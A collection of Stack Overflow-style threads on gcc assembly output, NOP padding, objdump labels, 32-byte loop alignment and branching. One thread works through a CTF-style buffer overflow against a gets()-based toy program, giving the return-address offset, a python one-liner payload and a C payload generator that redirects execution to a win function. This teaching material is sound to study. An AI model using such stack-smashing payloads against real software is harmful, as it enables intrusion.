Why is gcc using two stores (`MOV %reg, (mem)`) instead of just one? - gcc

Compiling the following with gcc (version: (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0):
if(n >= m)
{
n = 0;
}
The code output looks like this:
23bd5: 48 3b 93 10 03 00 00 cmp 0x310(%rbx),%rdx
23bdc: 48 89 93 20 03 00 00 mov %rdx,0x320(%rbx)
23be3: 72 0d jb 23bf2
23be5: 48 c7 83 20 03 00 00 movq $0x0,0x320(%rbx)
23bec: 00 00 00 00
23bf0: 31 d2 xor %edx,%edx
23bf2: ....
I'm wondering why the compiler decides to use what looks like a rather expensive set of instructions. I would have used the following instead:
cmp 0x310(%rbx), %rdx
jb .L1
xor %edx, %edx
.L1:
mov %rdx, 0x320(%rbx)
Could it be because the XOR takes so much time that it would stall before the store? Or is it that the first store doesn't really happen if the processor detects the second store? Or is it that the second store is nearly instant because it will use the L1 cache (presumably)?
(that being said, the store could happen later as other instructions coming after could safely be moved before that store).
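For reference, here is a compilable guess at the surrounding code (the structure layout and types are not given in the question; the fields below are assumptions chosen only so that m and n land at offsets 0x310 and 0x320, matching the disassembly):
/* repro.c -- a guessed reproducer, not the original source */
struct ctx {
    unsigned long pad[98];   /* 98 * 8 = 0x310 bytes of padding (assumption) */
    unsigned long m;         /* at offset 0x310 */
    unsigned long pad2;
    unsigned long n;         /* at offset 0x320 */
};
void update(struct ctx *c, unsigned long value)
{
    c->n = value;            /* candidate for the unconditional first store */
    if (c->n >= c->m)
        c->n = 0;            /* the conditional second store */
}
Whether gcc 7.5 emits exactly the two-store sequence shown above for this guess depends on the real surrounding code, so treat it only as something to experiment with (for example, gcc -O2 -S repro.c).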

Related

Why do I find some never called instructions nopl, nopw after ret or jmp in GCC compiled code? [duplicate]

I've been working with C for a short while and very recently started to get into ASM. When I compile a program:
int main(void)
{
int a = 0;
a += 1;
return 0;
}
The objdump disassembly has the code, but nops after the ret:
...
08048394 <main>:
8048394: 55 push %ebp
8048395: 89 e5 mov %esp,%ebp
8048397: 83 ec 10 sub $0x10,%esp
804839a: c7 45 fc 00 00 00 00 movl $0x0,-0x4(%ebp)
80483a1: 83 45 fc 01 addl $0x1,-0x4(%ebp)
80483a5: b8 00 00 00 00 mov $0x0,%eax
80483aa: c9 leave
80483ab: c3 ret
80483ac: 90 nop
80483ad: 90 nop
80483ae: 90 nop
80483af: 90 nop
...
From what I've learned, NOPs do nothing, and since they come after ret they wouldn't even be executed.
My question is: why bother? Couldn't ELF (linux-x86) work with a .text section (+main) of any size?
I'd appreciate any help, just trying to learn.
First of all, gcc doesn't always do this. The padding is controlled by -falign-functions, which is automatically turned on by -O2 and -O3:
-falign-functions
-falign-functions=n
Align the start of functions to the next power-of-two greater than n, skipping up to n bytes. For instance,
-falign-functions=32 aligns functions to the next 32-byte boundary, but -falign-functions=24 would align to the next 32-byte boundary only
if this can be done by skipping 23 bytes or less.
-fno-align-functions and -falign-functions=1 are equivalent and mean that functions will not be aligned.
Some assemblers only support this flag when n is a power of two; in
that case, it is rounded up.
If n is not specified or is zero, use a machine-dependent default.
Enabled at levels -O2, -O3.
There could be multiple reasons for doing this, but the main one on x86 is probably this:
Most processors fetch instructions in aligned 16-byte or 32-byte blocks. It can be
advantageous to align critical loop entries and subroutine entries by 16 in order to minimize
the number of 16-byte boundaries in the code. Alternatively, make sure that there is no 16-byte boundary in the first few instructions after a critical loop entry or subroutine entry.
(Quoted from "Optimizing subroutines in assembly
language" by Agner Fog.)
edit: Here is an example that demonstrates the padding:
// align.c
int f(void) { return 0; }
int g(void) { return 0; }
When compiled using gcc 4.4.5 with default settings, I get:
align.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <f>:
0: 55 push %rbp
1: 48 89 e5 mov %rsp,%rbp
4: b8 00 00 00 00 mov $0x0,%eax
9: c9 leaveq
a: c3 retq
000000000000000b <g>:
b: 55 push %rbp
c: 48 89 e5 mov %rsp,%rbp
f: b8 00 00 00 00 mov $0x0,%eax
14: c9 leaveq
15: c3 retq
Specifying -falign-functions gives:
align.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <f>:
0: 55 push %rbp
1: 48 89 e5 mov %rsp,%rbp
4: b8 00 00 00 00 mov $0x0,%eax
9: c9 leaveq
a: c3 retq
b: eb 03 jmp 10 <g>
d: 90 nop
e: 90 nop
f: 90 nop
0000000000000010 <g>:
10: 55 push %rbp
11: 48 89 e5 mov %rsp,%rbp
14: b8 00 00 00 00 mov $0x0,%eax
19: c9 leaveq
1a: c3 retq
This is done to align the next function to an 8-, 16- or 32-byte boundary.
From “Optimizing subroutines in assembly language” by A. Fog:
11.5 Alignment of code
Most microprocessors fetch code in aligned 16-byte or 32-byte blocks. If an important subroutine entry or jump label happens to be near the end of a 16-byte block then the microprocessor will only get a few useful bytes of code when fetching that block of code. It may have to fetch the next 16 bytes too before it can decode the first instructions after the label. This can be avoided by aligning important subroutine entries and loop entries by 16.
[...]
Aligning a subroutine entry is as simple as putting as many NOPs as needed before the subroutine entry to make the address divisible by 8, 16, 32 or 64, as desired.
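As an aside (not from the quoted text): besides the global -falign-functions switch, GCC can be asked to align an individual function with the aligned attribute; the gap before it then gets padded, typically with NOPs, just as in the align.c example above. A minimal sketch:
/* only this function is requested to start on a 32-byte boundary */
__attribute__((aligned(32)))
int hot_function(void)
{
    return 0;
}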
As far as I remember, instructions are pipelined in the CPU, and different CPU blocks (loader, decoder and such) process subsequent instructions. When the RET instruction is being executed, the next few instructions are already loaded into the CPU pipeline. It's a guess, but you can start digging there, and if you find out more (maybe the specific number of NOPs that is safe), please share your findings.

Buffer overflow: overwrite CH

I have a program that is vulnerable to buffer overflow. The vulnerable function takes 2 arguments. The first is a standard 4 bytes. For the second, however, the program performs the following:
xor ch, 0
...
cmp dword ptr [ebp+10h], 0F00DB4BE
Now, if I supply 2 different 4-byte arguments as part of my exploit, i.e. ABCDEFGH (assume ABCD is the first argument, EFGH the second), CH becomes G. So naturally I thought about crafting the following (assume ABCD is right):
ABCD\x00\x0d\x00\x00
What happens, however, is that null bytes seem to be ignored! Sending the above results in CH = 0 and CL = 0xd. This happens no matter where I put \x0d, i.e.:
ABCD\x0d\x00\x00\x00
ABCD\x00\x0d\x00\x00
ABCD\x00\x00\x0d\x00
ABCD\x00\x00\x00\x0d
all yield the same behavior.
How can I proceed to only overwrite CH while leaving the rest of ECX as null?
EDIT: see my own answer below. The short version is that bash ignores null bytes, which partially explains why the exploit didn't work locally. The exact reason can be found here. Thanks to Michael Petch for pointing it out!
Source:
#include <stdio.h>
#include <stdlib.h>
void win(long long arg1, int arg2)
{
if (arg1 != 0x14B4DA55 || arg2 != 0xF00DB4BE)
{
puts("Close, but not quite.");
exit(1);
}
printf("You win!\n");
}
void vuln()
{
char buf[16];
printf("Type something>");
gets(buf);
printf("You typed %s!\n", buf);
}
int main()
{
/* Disable buffering on stdout */
setvbuf(stdout, NULL, _IONBF, 0);
vuln();
return 0;
}
The relevant part of objdump's disassembly of the executable is:
080491c2 <win>:
80491c2: 55 push %ebp
80491c3: 89 e5 mov %esp,%ebp
80491c5: 81 ec 28 01 00 00 sub $0x128,%esp
80491cb: 8b 4d 08 mov 0x8(%ebp),%ecx
80491ce: 89 8d e0 fe ff ff mov %ecx,-0x120(%ebp)
80491d4: 8b 4d 0c mov 0xc(%ebp),%ecx
80491d7: 89 8d e4 fe ff ff mov %ecx,-0x11c(%ebp)
80491dd: 8b 8d e0 fe ff ff mov -0x120(%ebp),%ecx
80491e3: 81 f1 55 da b4 14 xor $0x14b4da55,%ecx
80491e9: 89 c8 mov %ecx,%eax
80491eb: 8b 8d e4 fe ff ff mov -0x11c(%ebp),%ecx
80491f1: 80 f5 00 xor $0x0,%ch
80491f4: 89 ca mov %ecx,%edx
80491f6: 09 d0 or %edx,%eax
80491f8: 85 c0 test %eax,%eax
80491fa: 75 09 jne 8049205 <win+0x43>
80491fc: 81 7d 10 be b4 0d f0 cmpl $0xf00db4be,0x10(%ebp)
8049203: 74 1a je 804921f <win+0x5d>
8049205: 83 ec 0c sub $0xc,%esp
8049208: 68 08 a0 04 08 push $0x804a008
804920d: e8 4e fe ff ff call 8049060 <puts@plt>
8049212: 83 c4 10 add $0x10,%esp
8049215: 83 ec 0c sub $0xc,%esp
8049218: 6a 01 push $0x1
804921a: e8 51 fe ff ff call 8049070 <exit@plt>
804921f: 83 ec 0c sub $0xc,%esp
8049222: 68 1e a0 04 08 push $0x804a01e
8049227: e8 34 fe ff ff call 8049060 <puts@plt>
804922c: 83 c4 10 add $0x10,%esp
804922f: 83 ec 08 sub $0x8,%esp
8049232: 68 27 a0 04 08 push $0x804a027
8049237: 68 29 a0 04 08 push $0x804a029
804923c: e8 5f fe ff ff call 80490a0 <fopen@plt>
8049241: 83 c4 10 add $0x10,%esp
8049244: 89 45 f4 mov %eax,-0xc(%ebp)
8049247: 83 7d f4 00 cmpl $0x0,-0xc(%ebp)
804924b: 75 12 jne 804925f <win+0x9d>
804924d: 83 ec 0c sub $0xc,%esp
8049250: 68 34 a0 04 08 push $0x804a034
8049255: e8 06 fe ff ff call 8049060 <puts@plt>
804925a: 83 c4 10 add $0x10,%esp
804925d: eb 31 jmp 8049290 <win+0xce>
804925f: 83 ec 04 sub $0x4,%esp
8049262: ff 75 f4 pushl -0xc(%ebp)
8049265: 68 00 01 00 00 push $0x100
804926a: 8d 85 f4 fe ff ff lea -0x10c(%ebp),%eax
8049270: 50 push %eax
8049271: e8 da fd ff ff call 8049050 <fgets@plt>
8049276: 83 c4 10 add $0x10,%esp
8049279: 83 ec 08 sub $0x8,%esp
804927c: 8d 85 f4 fe ff ff lea -0x10c(%ebp),%eax
8049282: 50 push %eax
8049283: 68 86 a0 04 08 push $0x804a086
8049288: e8 a3 fd ff ff call 8049030 <printf@plt>
804928d: 83 c4 10 add $0x10,%esp
8049290: 90 nop
8049291: c9 leave
8049292: c3 ret
08049293 <vuln>:
8049293: 55 push %ebp
8049294: 89 e5 mov %esp,%ebp
8049296: 83 ec 18 sub $0x18,%esp
8049299: 83 ec 0c sub $0xc,%esp
804929c: 68 90 a0 04 08 push $0x804a090
80492a1: e8 8a fd ff ff call 8049030 <printf@plt>
80492a6: 83 c4 10 add $0x10,%esp
80492a9: 83 ec 0c sub $0xc,%esp
80492ac: 8d 45 e8 lea -0x18(%ebp),%eax
80492af: 50 push %eax
80492b0: e8 8b fd ff ff call 8049040 <gets@plt>
80492b5: 83 c4 10 add $0x10,%esp
80492b8: 83 ec 08 sub $0x8,%esp
80492bb: 8d 45 e8 lea -0x18(%ebp),%eax
80492be: 50 push %eax
80492bf: 68 a0 a0 04 08 push $0x804a0a0
80492c4: e8 67 fd ff ff call 8049030 <printf@plt>
80492c9: 83 c4 10 add $0x10,%esp
80492cc: 90 nop
80492cd: c9 leave
80492ce: c3 ret
080492cf <main>:
80492cf: 8d 4c 24 04 lea 0x4(%esp),%ecx
80492d3: 83 e4 f0 and $0xfffffff0,%esp
80492d6: ff 71 fc pushl -0x4(%ecx)
80492d9: 55 push %ebp
80492da: 89 e5 mov %esp,%ebp
80492dc: 51 push %ecx
80492dd: 83 ec 04 sub $0x4,%esp
80492e0: a1 34 c0 04 08 mov 0x804c034,%eax
80492e5: 6a 00 push $0x0
80492e7: 6a 02 push $0x2
80492e9: 6a 00 push $0x0
80492eb: 50 push %eax
80492ec: e8 9f fd ff ff call 8049090 <setvbuf@plt>
80492f1: 83 c4 10 add $0x10,%esp
80492f4: e8 9a ff ff ff call 8049293 <vuln>
80492f9: b8 00 00 00 00 mov $0x0,%eax
80492fe: 8b 4d fc mov -0x4(%ebp),%ecx
8049301: c9 leave
8049302: 8d 61 fc lea -0x4(%ecx),%esp
8049305: c3 ret
It is unclear why you are hung up on the value in ECX or the xor ch, 0 instruction inside the win function. From the C code it is clear that the check for a win requires the 64-bit (long long) arg1 to be 0x14B4DA55 and arg2 to be 0xF00DB4BE. When that condition is met it will print You win!
We need some kind of buffer exploit that has the capability to execute the win function and make it appear that it is being passed a first argument (64-bit long long) and a 32-bit int as a second parameter.
The most obvious way to pull this off is to overrun buf in function vuln in a way that strategically overwrites the return address, replacing it with the address of win. In the disassembled output win is at 0x080491c2. We will need to write 0x080491c2 followed by some dummy value for a return address, followed by the 64-bit value 0x14B4DA55 (same as 0x0000000014B4DA55) followed by the 32-bit value 0xF00DB4BE.
The dummy value for a return address is needed because we need to simulate a function call on the stack. We won't be issuing a call instruction, so we have to make it appear as if one had been done. The goal is to print You win!; whether the program crashes after that isn't relevant.
The return address (win), arg1, and arg2 will have to be stored as bytes in reverse order since the x86 processors are little endian.
The last big question is how many bytes do we have to feed to gets to overrun the buffer to reach the return address? You could use trial and error (bruteforce) to figure this out, but we can look at the disassembly of the call to gets:
80492ac: 8d 45 e8 lea -0x18(%ebp),%eax
80492af: 50 push %eax
80492b0: e8 8b fd ff ff call 8049040 <gets@plt>
LEA is being used to compute the address (Effective Address) of buf on the stack and passing that as the first argument to gets. 0x18 is 24 bytes (decimal). Although buf was defined to be 16 bytes in length the compiler also allocated additional space for alignment purposes. We have to add an additional 4 bytes to account for the fact that the function prologue pushed EBP on the stack. That is a total of 28 bytes (24+4) to reach the position of the return address on the stack.
Using Python to generate the input sequence is common in many tutorials. Embedding NUL (\0) characters in a shell string directly may cause the shell to prematurely terminate the string at the NUL byte (an issue that people have when using Bash). We can pipe the byte sequence to our program using something like:
python -c 'print "A"*28+"\xc2\x91\x04\x08" \
+"B"*4+"\x55\xda\xb4\x14\x00\x00\x00\x00\xbe\xb4\x0d\xf0"' | ./progname
Where progname is the name of your executable. When run it should appear similar to:
Type something>You typed AAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBUڴ!
You win!
Segmentation fault
Note: the 4 characters making up the return address between the A's and B's are unprintable so they don't appear in the console output but they are still present as well as all the other unprintable characters.
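If you prefer to avoid the shell pipeline entirely, a small C helper can write the same byte sequence (a sketch; the win address 0x080491c2 and the 28-byte offset are taken from this answer and must be adjusted for your own binary):
/* payload.c -- emits filler + &win + dummy return address + arg1 + arg2 */
#include <stdio.h>
#include <string.h>
int main(void)
{
    unsigned char payload[48];
    size_t off = 0;
    unsigned int win = 0x080491c2;             /* address of win() from objdump */
    unsigned long long arg1 = 0x14B4DA55ULL;   /* 64-bit first argument */
    unsigned int arg2 = 0xF00DB4BE;            /* 32-bit second argument */
    memset(payload + off, 'A', 28); off += 28; /* filler up to the saved return address */
    memcpy(payload + off, &win, 4); off += 4;
    memset(payload + off, 'B', 4);  off += 4;  /* dummy return address for the fake frame */
    memcpy(payload + off, &arg1, 8); off += 8; /* copying native values assumes a little-endian host */
    memcpy(payload + off, &arg2, 4); off += 4;
    fwrite(payload, 1, off, stdout);
    putchar('\n');                             /* gets() stops at the newline */
    return 0;
}
Compile it and use it like ./payload | ./progname.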
As a limited answer to my own question, specifically regarding why null bytes are ignored:
It seems to be an issue with Bash ignoring null bytes.
Many of my peers faced the same problem when writing the exploit. It would work on the server but not locally, when using gdb for example. Bash would simply disregard the null bytes, and thus \x55\xda\xb4\x14\x00\x00\x00\x00\xbe\xb4\x0d\xf0 would be read in as \x55\xda\xb4\x14\xbe\xb4\x0d\xf0. The exact reason why it behaves that way still eludes me, but it's a good thing to keep in mind!

Objdump disassemble doesn't match source code

I'm investigating the execution flow of an OpenMP program linked to libgomp. It uses the #pragma omp parallel for construct. I already know that this construct becomes, among other things, a call to the GOMP_parallel function, which is implemented as follows:
void
GOMP_parallel (void (*fn) (void *), void *data,
unsigned num_threads, unsigned int flags)
{
num_threads = gomp_resolve_num_threads (num_threads, 0);
gomp_team_start (fn, data, num_threads, flags, gomp_new_team (num_threads));
fn (data);
ialias_call (GOMP_parallel_end) ();
}
When executing objdump -d on libgomp, GOMP_parallel appears as:
000000000000bc80 <GOMP_parallel@@GOMP_4.0>:
bc80: 41 55 push %r13
bc82: 41 54 push %r12
bc84: 41 89 cd mov %ecx,%r13d
bc87: 55 push %rbp
bc88: 53 push %rbx
bc89: 48 89 f5 mov %rsi,%rbp
bc8c: 48 89 fb mov %rdi,%rbx
bc8f: 31 f6 xor %esi,%esi
bc91: 89 d7 mov %edx,%edi
bc93: 48 83 ec 08 sub $0x8,%rsp
bc97: e8 d4 fd ff ff callq ba70 <GOMP_ordered_end@@GOMP_1.0+0x70>
bc9c: 41 89 c4 mov %eax,%r12d
bc9f: 89 c7 mov %eax,%edi
bca1: e8 ca 37 00 00 callq f470 <omp_in_final@@OMP_3.1+0x2c0>
bca6: 44 89 e9 mov %r13d,%ecx
bca9: 44 89 e2 mov %r12d,%edx
bcac: 48 89 ee mov %rbp,%rsi
bcaf: 48 89 df mov %rbx,%rdi
bcb2: 49 89 c0 mov %rax,%r8
bcb5: e8 16 39 00 00 callq f5d0 <omp_in_final@@OMP_3.1+0x420>
bcba: 48 89 ef mov %rbp,%rdi
bcbd: ff d3 callq *%rbx
bcbf: 48 83 c4 08 add $0x8,%rsp
bcc3: 5b pop %rbx
bcc4: 5d pop %rbp
bcc5: 41 5c pop %r12
bcc7: 41 5d pop %r13
bcc9: e9 32 ff ff ff jmpq bc00 <GOMP_parallel_end@@GOMP_1.0>
bcce: 66 90 xchg %ax,%ax
First, there isn't any call to GOMP_ordered_end in the source code of GOMP_parallel, for example. Second, that function consists of:
void
GOMP_ordered_end (void)
{
}
According to the objdump output, this function starts at ba00 and finishes at bbbd. How can there be so much code in a function that is empty? By the way, there is a comment in the source code of libgomp saying that it should appear only when using the ORDERED construct (as the name suggests), which is not the case in my test.
Finally, the main concern for me here is: why does the source code differ so much from the disassembly? Why, for example, isn't there any mention of gomp_team_start in the assembly?
The system has gcc version 5.4.0
According to the objdump output, this function starts at ba00 and finishes at bbbd.
How can there be so much code in a function that is empty?
The function itself is small, but GCC just used some additional bytes to align the next function and store some static data (probably used by other functions in this file). Here's what I see in a local ordered.o:
00000000000003b0 <GOMP_ordered_end>:
3b0: f3 c3 repz retq
3b2: 66 66 66 66 66 2e 0f data32 data32 data32 data32 nopw %cs:0x0(%rax,%rax,1)
3b9: 1f 84 00 00 00 00 00
First, there isn't any call to GOMP_ordered_end in the source code of GOMP_parallel, for example.
Don't get distracted by the GOMP_ordered_end@@GOMP_1.0+0x70 label in the assembly code. All it says is that this call targets some local library function (for which objdump didn't find any symbol info) that happens to be located 112 bytes after GOMP_ordered_end. This is most likely gomp_resolve_num_threads.
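If you want to see this labeling behaviour in isolation, here is a made-up example (file and function names are hypothetical, not from libgomp): a static helper whose symbol disappears from the stripped shared object.
/* labeldemo.c -- build with:
 *   gcc -O2 -fPIC -shared labeldemo.c -o liblabeldemo.so && strip liblabeldemo.so
 * then disassemble with objdump -d. The call to helper() no longer has a
 * symbol of its own, so objdump prints the target relative to whatever nearby
 * symbol survives, much like <GOMP_ordered_end@@GOMP_1.0+0x70> above. */
__attribute__((noinline))
static int helper(int x)
{
    return x * 3;
}
int exported(int x)
{
    return helper(x) + 1;
}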
Why, for example, isn't there any mention to gomp_team_start in the assembly?
Hm, this looks pretty much like it:
bcb5: e8 16 39 00 00 callq f5d0 <omp_in_final@@OMP_3.1+0x420>

Why does loop alignment on 32 byte make code faster?

Look at this code:
one.cpp:
bool test(int a, int b, int c, int d);
int main() {
volatile int va = 1;
volatile int vb = 2;
volatile int vc = 3;
volatile int vd = 4;
int a = va;
int b = vb;
int c = vc;
int d = vd;
int s = 0;
__asm__("nop"); __asm__("nop"); __asm__("nop"); __asm__("nop");
__asm__("nop"); __asm__("nop"); __asm__("nop"); __asm__("nop");
__asm__("nop"); __asm__("nop"); __asm__("nop"); __asm__("nop");
__asm__("nop"); __asm__("nop"); __asm__("nop"); __asm__("nop");
for (int i=0; i<2000000000; i++) {
s += test(a, b, c, d);
}
return s;
}
two.cpp:
bool test(int a, int b, int c, int d) {
// return a == d || b == d || c == d;
return false;
}
There are 16 nops in one.cpp. You can comment/decomment them to change alignment of the loop's entry point between 16 and 32. I've compiled them with g++ one.cpp two.cpp -O3 -mtune=native.
Here are my questions:
the 32-aligned version is faster than the 16-aligned version. On Sandy Bridge, the difference is 20%; on Haswell, 8%. Why the difference?
with the 32-aligned version, the code runs at the same speed on Sandy Bridge no matter which return statement is in two.cpp. I thought the return false version should be at least a little bit faster. But no, exactly the same speed!
If I remove the volatiles from one.cpp, the code becomes slower (Haswell: before: ~2.17 sec, after: ~2.38 sec). Why is that? But this only happens when the loop is aligned to 32.
The fact that the 32-aligned version is faster is strange to me, because the Intel® 64 and IA-32 Architectures Optimization Reference Manual says (page 3-9):
Assembly/Compiler Coding Rule 12. (M impact, H generality) All branch
targets should be 16- byte aligned.
Another little question: are there any tricks to make only this loop 32-aligned (so the rest of the code could keep using 16-byte alignment)?
Note: I've tried compilers gcc 6, gcc 7 and clang 3.9, same results.
Here's the code with volatile (the code is the same for 16/32 aligned, just the addresses differ):
0000000000000560 <main>:
560: 41 57 push r15
562: 41 56 push r14
564: 41 55 push r13
566: 41 54 push r12
568: 55 push rbp
569: 31 ed xor ebp,ebp
56b: 53 push rbx
56c: bb 00 94 35 77 mov ebx,0x77359400
571: 48 83 ec 18 sub rsp,0x18
575: c7 04 24 01 00 00 00 mov DWORD PTR [rsp],0x1
57c: c7 44 24 04 02 00 00 mov DWORD PTR [rsp+0x4],0x2
583: 00
584: c7 44 24 08 03 00 00 mov DWORD PTR [rsp+0x8],0x3
58b: 00
58c: c7 44 24 0c 04 00 00 mov DWORD PTR [rsp+0xc],0x4
593: 00
594: 44 8b 3c 24 mov r15d,DWORD PTR [rsp]
598: 44 8b 74 24 04 mov r14d,DWORD PTR [rsp+0x4]
59d: 44 8b 6c 24 08 mov r13d,DWORD PTR [rsp+0x8]
5a2: 44 8b 64 24 0c mov r12d,DWORD PTR [rsp+0xc]
5a7: 0f 1f 44 00 00 nop DWORD PTR [rax+rax*1+0x0]
5ac: 66 2e 0f 1f 84 00 00 nop WORD PTR cs:[rax+rax*1+0x0]
5b3: 00 00 00
5b6: 66 2e 0f 1f 84 00 00 nop WORD PTR cs:[rax+rax*1+0x0]
5bd: 00 00 00
5c0: 44 89 e1 mov ecx,r12d
5c3: 44 89 ea mov edx,r13d
5c6: 44 89 f6 mov esi,r14d
5c9: 44 89 ff mov edi,r15d
5cc: e8 4f 01 00 00 call 720 <test(int, int, int, int)>
5d1: 0f b6 c0 movzx eax,al
5d4: 01 c5 add ebp,eax
5d6: 83 eb 01 sub ebx,0x1
5d9: 75 e5 jne 5c0 <main+0x60>
5db: 48 83 c4 18 add rsp,0x18
5df: 89 e8 mov eax,ebp
5e1: 5b pop rbx
5e2: 5d pop rbp
5e3: 41 5c pop r12
5e5: 41 5d pop r13
5e7: 41 5e pop r14
5e9: 41 5f pop r15
5eb: c3 ret
5ec: 0f 1f 40 00 nop DWORD PTR [rax+0x0]
Without volatile:
0000000000000560 <main>:
560: 55 push rbp
561: 31 ed xor ebp,ebp
563: 53 push rbx
564: bb 00 94 35 77 mov ebx,0x77359400
569: 48 83 ec 08 sub rsp,0x8
56d: 66 0f 1f 84 00 00 00 nop WORD PTR [rax+rax*1+0x0]
574: 00 00
576: 66 2e 0f 1f 84 00 00 nop WORD PTR cs:[rax+rax*1+0x0]
57d: 00 00 00
580: b9 04 00 00 00 mov ecx,0x4
585: ba 03 00 00 00 mov edx,0x3
58a: be 02 00 00 00 mov esi,0x2
58f: bf 01 00 00 00 mov edi,0x1
594: e8 47 01 00 00 call 6e0 <test(int, int, int, int)>
599: 0f b6 c0 movzx eax,al
59c: 01 c5 add ebp,eax
59e: 83 eb 01 sub ebx,0x1
5a1: 75 dd jne 580 <main+0x20>
5a3: 48 83 c4 08 add rsp,0x8
5a7: 89 e8 mov eax,ebp
5a9: 5b pop rbx
5aa: 5d pop rbp
5ab: c3 ret
5ac: 0f 1f 40 00 nop DWORD PTR [rax+0x0]
This doesn't answer point 2 (return a == d || b == d || c == d; being the same speed as return false). That's still a maybe-interesting question, since that must compile to multiple uop-cache lines of instructions.
The fact that the 32-aligned version is faster is strange to me, because [Intel's manual says to align to 16]
That optimization-guide advice is a very general guideline, and definitely doesn't mean that larger never helps. Usually it doesn't, and padding to 32 would be more likely to hurt than help. (I-cache misses, ITLB misses, and more code bytes to load from disk).
In fact, 16B alignment is rarely necessary, especially on CPUs with a uop cache. For a small loop that can run from the loop buffer, alignment is usually totally irrelevant.
(Skylake microcode updates disabled the loop buffer to work around a partial-register AH-merging bug, SKL150. This creates problems for tiny loops that span a 32-byte boundary, only running one iteration per 2 clocks instead of the one iteration per 1.5 clocks you might get from a 6-uop loop on Haswell, or on SKL with older microcode. The LSD is not re-enabled until Ice Lake; it remains disabled in Kaby/Coffee/Comet Lake, which are the same microarchitecture as SKL/SKX.)
Another SKL erratum workaround created another worse code-alignment pothole: How can I mitigate the impact of the Intel jcc erratum on gcc?
16B is still not bad as a broad recommendation, but it doesn't tell you everything you need to know to understand one specific case on a couple of specific CPUs.
Compilers usually default to aligning loop branches and function entry-points, but usually don't align other branch targets. The cost of executing a NOP (and code bloat) is often larger than the likely cost of an unaligned non-loop branch target.
Code alignment has some direct and some indirect effects. The direct effects include the uop cache on Intel SnB-family. For example, see Branch alignment for loops involving micro-coded instructions on Intel SnB-family CPUs.
Another section of Intel's optimization manual goes into some detail about how the uop cache works:
2.3.2.2 Decoded ICache:
All micro-ops in a Way (uop cache line) represent instructions which are statically contiguous in the code and have their EIPs within the
same aligned 32-byte region. (I think this means an instruction that
extends past the boundary goes in the uop cache for the block
containing its start, rather than end. Spanning instructions have to
go somewhere, and the branch target address that would run the
instruction is the start of the insn, so it's most useful to put it in
a line for that block).
A multi micro-op instruction cannot be split across Ways.
An instruction which turns on the MSROM consumes an entire Way.
Up to two branches are allowed per Way.
A pair of macro-fused instructions is kept as one micro-op.
See also Agner Fog's microarch guide. He adds:
An unconditional jump or call always ends a μop cache line
lots of other stuff that probably isn't relevant here.
Also, if your code doesn't fit in the uop cache, it can't run from the loop buffer.
The indirect effects of alignment include:
larger/smaller code-size (L1I cache misses, TLB). Not relevant for your test
which branches alias each other in the BTB (Branch Target Buffer).
If I remove volatiles from one.cpp, code becomes slower. Why is that?
The larger instructions (5-byte mov-immediates instead of 3-byte register copies) push the last instructions in the loop across a 32B boundary:
59e: 83 eb 01 sub ebx,0x1
5a1: 75 dd jne 580 <main+0x20>
So if you aren't running from the loop buffer (LSD), then without volatile one of the uop-cache fetch cycles gets only 1 uop.
If sub/jne macro-fuses, this might not apply. And I think only crossing a 64B boundary would break macro-fusion.
Also, those aren't real addresses. Have you checked what the addresses are after linking? There could be a 64B boundary there after linking, if the text section has less than 64B alignment.
Also related to 32-byte boundaries, the JCC erratum disables the uop cache for blocks where a branch (including macro-fused ALU+JCC) includes the last byte of the line, on Skylake CPUs.
How can I mitigate the impact of the Intel jcc erratum on gcc?
Sorry, I haven't actually tested this to say more about this specific case. The point is, when you bottleneck on the front-end from stuff like having a call/ret inside a tight loop, alignment becomes important and can get extremely complex. Boundary-crossing or not for all future instructions is affected. Do not expect it to be simple. If you've read my other answers, you'll know I'm not usually the kind of person to say "it's too complicated to fully explain", but alignment can be that way.
See also Code alignment in one object file is affecting the performance of a function in another object file
In your case, make sure tiny functions inline. Use link-time optimization if your code-base has any important tiny functions in separate .c files instead of in a .h where they can inline. Or change your code to put them in a .h.
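Regarding the side question about getting only that loop 32-byte aligned: this isn't covered above, but two things to try (sketches, not guarantees) are -falign-loops=32, which affects every loop GCC chooses to align, or hand-placing an assembler directive just before the loop in one.cpp:
// pad the instruction stream to the next 32-byte boundary here;
// check the disassembly afterwards, since optimization can still
// move the loop's actual branch target off the boundary
__asm__ volatile (".p2align 5");
for (int i = 0; i < 2000000000; i++) {
    s += test(a, b, c, d);
}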

Why are ternary and logical operators more efficient than if branches?

I stumbled upon this question/answer which mentions that in most languages, logical operators such as:
x == y && doSomething();
can be faster than doing the same thing with an if branch:
if(x == y) {
doSomething();
}
Similarly, it says that the ternary operator:
x = y == z ? 0 : 1
is usually faster than using an if branch:
if(y == z) {
x = 0;
} else {
x = 1;
}
This got me Googling, which led me to this fantastic answer which explains branch prediction.
Basically, what it says is that the CPU operates at very fast speeds, and rather than slowing down to compute every if branch, it tries to guess what outcome will take place and places the appropriate instructions in its pipeline. But if it makes the wrong guess, it will have to back up and recompute the appropriate instructions.
But this still doesn't explain to me why logical operators or the ternary operator are treated differently than if branches. Since the CPU doesn't know the outcome of x == y, shouldn't it still have to guess whether to place the call to doSomething() (and therefore, all of doSomething's code) into its pipeline? And, therefore, back up if its guess was incorrect? Similarly, for the ternary operator, shouldn't the CPU have to guess whether y == z will evaluate to true when determining what to store in x, and back up if its guess was wrong?
I don't understand why if branches are treated any differently by the compiler than any other statement which is conditional. Shouldn't all conditionals be evaluated the same way?
Short answer: it simply isn't. While helping branch prediction could improve your performance, writing the condition as part of a logical statement doesn't change the compiled code.
If you want to help branch prediction, use __builtin_expect (a GCC built-in).
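For example, reusing the identifiers from the question (the second argument, 0, tells the compiler we expect x == y to be false most of the time):
if (__builtin_expect(x == y, 0)) {   /* hint: this branch is rarely taken */
    doSomething();
}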
To emphasize this, let's compare the compiler output:
#include <stdio.h>
int main(){
int foo;
scanf("%d", &foo); /*Needed to eliminate optimizations*/
#ifdef IF
if (foo)
printf("Foo!");
#else
foo && printf("Foo!");
#endif
return 0;
}
For gcc -O3 branch.c -DIF
We get:
0000000000400540 <main>:
400540: 48 83 ec 18 sub $0x18,%rsp
400544: 31 c0 xor %eax,%eax
400546: bf 68 06 40 00 mov $0x400668,%edi
40054b: 48 8d 74 24 0c lea 0xc(%rsp),%rsi
400550: e8 e3 fe ff ff callq 400438 <__isoc99_scanf@plt>
400555: 8b 44 24 0c mov 0xc(%rsp),%eax
400559: 85 c0 test %eax,%eax #This is the relevant part
